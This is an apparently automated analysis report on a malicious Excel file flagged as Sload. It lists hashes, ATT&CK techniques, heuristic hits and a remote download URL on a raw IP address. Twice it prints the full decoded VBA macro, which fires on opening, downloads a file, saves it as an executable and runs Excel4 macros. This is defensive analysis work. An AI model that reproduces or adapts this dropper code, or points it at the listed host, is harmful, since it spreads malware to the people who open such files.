Office (OLE) malware analysis — malicious · 15301f69844ff2bd

MALICIOUS

Office (OLE)

211.8 KB Created: 2019-05-18 07:27:21 Authoring application: Microsoft Excel First seen: 2021-04-10

MD5: 2fd4fdf21e355776d4344b2aea022157 SHA-1: 3b4080ee9a54203a334f05befe20609402f82b77 SHA-256: 15301f69844ff2bdcf77dab4bc3cc604a1ba19460eda5c2cdab077fe7624d287

310 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample is an Excel file containing VBA macros that are triggered by the Workbook_Open event. The macros utilize CreateObject and CallByName to download a file from a remote URL (http://169.239.129.61/k1) and execute it, as indicated by the 'OLE_VBA_HTTP_DROP_EXEC' and 'SC_STR_CMD' heuristic firings. The presence of the 'Xls.Malware.Sload-7057784-0' ClamAV detection further confirms its malicious nature.

Heuristics 9

ClamAV: Xls.Malware.Sload-7057784-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Sload-7057784-0
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
Matched line in script
```
    .write Form17.DisableV1.responseBody
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set Form17.SubMainR1 = CreateObject(Form17.Label2.Tag)
```
CallByName call high OLE_VBA_CALLBYNAME

CallByName call
Matched line in script
```
CallByName UserForm2, "Show", VbMethod
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub WorkBook_open()
```
Suspicious cmd.exe invocation with execution flag high SC_STR_CMD

Suspicious cmd.exe invocation with execution flag
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://169.239.129.61/k1� Referenced by macro
- http://t2.symcb.com0Referenced by macro
- http://tl.symcd.com0&Referenced by macro
- http://t1.symcb.com/ThawtePCA.crl0Referenced by macro
- http://tl.symcb.com/tl.crl0Referenced by macro
- https://www.thawte.com/cps0/Referenced by macro
- https://www.thawte.com/repository0WReferenced by macro
- http://tl.symcb.com/tl.crt0Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

Filename	Kind	Source	Size
`macros.bas`🔏 SignedVBA project digital signature Covers VBA source only — not the compiled p-code. A digital signature does not by itself mean the macro is safe.	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3102 bytes
SHA-256: `478d1f8d6006c3d99af1af953a9515864df9e6f6b4577796a230e6d9d65fc317`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Sub WorkBook_open() On Error Resume Next CallByName UserForm2, "Show", VbMethod End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Public Sub Anykey() Dim time time = Format(Now + TimeSerial(0, 1, 1), "hh:mm") ExecuteExcel4Macro "MESSAGE(False, ""Debug"")" #If RRRQUY2 Then Dim BailoDHLAS5 Dim BailoDHLAS6 Dim BailoDHLAS7 Dim BailoDHLAS9 Dim BailoDHLAS8 Dim BailoDHLAS11 Dim BailoDHLAS12 #End If #If Not RRRQUY2231 Then Set Form17.SubMainR1 = CreateObject(Form17.Label2.Tag) Set Form17.DisableV1 = CreateObject(Form17.Label1.Tag) #End If End Sub Attribute VB_Name = "Form17" Attribute VB_Base = "0{DC5218A9-CCA8-434A-A2AF-579F6CEEC007}{FB3527C3-7FCC-4397-AC05-8B24E566A281}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Public SubMainR1 As Object Public DisableV1 As Object Public SubMainR2 As Object Public DisableV2 As Object Public SubMainR3 As Object Public DisableV3 As Object Public Sub Label5_Click() Dim BailoDHLAS5 DisableV1.Open Me.Label3.Caption, Me.T10_Text.Tag, False Dim BailoDHLAS6 End Sub Public Sub S1000() End Sub Public Sub frfr4() End Sub Attribute VB_Name = "Modu" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Public Sub Attention() Sheet1.Anykey Dim BailoDHLAS4 Dim BailoDHLAS3 Form17.Label5_Click Form17.DisableV1.Send With Form17.SubMainR1 .Type = 1 End With Form17.SubMainR1.Open With Form17.SubMainR1 .write Form17.DisableV1.responseBody End With #If RRRQUY Then Form17.SubMainR1.savetofile "rdy.e" & "xe", 2 #End If ExecuteExcel4Macro Form17.T10_Text.Text ExecuteExcel4Macro "MESSAGE(False, ""On2"")" End Sub Attribute VB_Name = "UserForm2" Attribute VB_Base = "0{0062A5F5-A213-45A9-AE2B-C9E67E660E46}{6E43B48E-F056-4E2E-B446-FB97ECF8CE45}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub FUnt() Dim rd1 As New Modu rd1.Attention End Sub Private Sub UserForm_Initialize() FUnt Unload Me End Sub

macros.bas🔏 Signed

vba-macro

oletools.olevba.extract_macros (decoded VBA source)

3102 bytes

SHA-256: 478d1f8d6006c3d99af1af953a9515864df9e6f6b4577796a230e6d9d65fc317

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub WorkBook_open()
On Error Resume Next
CallByName UserForm2, "Show", VbMethod



End Sub




Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Public Sub Anykey()
Dim time
time = Format(Now + TimeSerial(0, 1, 1), "hh:mm")

ExecuteExcel4Macro "MESSAGE(False, ""Debug"")"
#If RRRQUY2 Then

Dim BailoDHLAS5
Dim BailoDHLAS6
Dim BailoDHLAS7
Dim BailoDHLAS9
Dim BailoDHLAS8
Dim BailoDHLAS11
Dim BailoDHLAS12


#End If


#If Not RRRQUY2231 Then
Set Form17.SubMainR1 = CreateObject(Form17.Label2.Tag)


Set Form17.DisableV1 = CreateObject(Form17.Label1.Tag)
#End If
End Sub



Attribute VB_Name = "Form17"
Attribute VB_Base = "0{DC5218A9-CCA8-434A-A2AF-579F6CEEC007}{FB3527C3-7FCC-4397-AC05-8B24E566A281}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
 Public SubMainR1 As Object
Public DisableV1 As Object
 Public SubMainR2 As Object
Public DisableV2 As Object
 Public SubMainR3 As Object
Public DisableV3 As Object



Public Sub Label5_Click()
Dim BailoDHLAS5
DisableV1.Open Me.Label3.Caption, Me.T10_Text.Tag, False
Dim BailoDHLAS6
End Sub

Public Sub S1000()

End Sub
Public Sub frfr4()

End Sub


Attribute VB_Name = "Modu"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Public Sub Attention()

Sheet1.Anykey


Dim BailoDHLAS4
Dim BailoDHLAS3
Form17.Label5_Click
Form17.DisableV1.Send

With Form17.SubMainR1
    .Type = 1
End With
    Form17.SubMainR1.Open
With Form17.SubMainR1
    .write Form17.DisableV1.responseBody

End With
#If RRRQUY Then
    Form17.SubMainR1.savetofile "rdy.e" & "xe", 2

#End If

ExecuteExcel4Macro Form17.T10_Text.Text
ExecuteExcel4Macro "MESSAGE(False, ""On2"")"
End Sub

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{0062A5F5-A213-45A9-AE2B-C9E67E660E46}{6E43B48E-F056-4E2E-B446-FB97ECF8CE45}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Sub FUnt()
Dim rd1 As New Modu
rd1.Attention

End Sub

Private Sub UserForm_Initialize()

FUnt
Unload Me
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.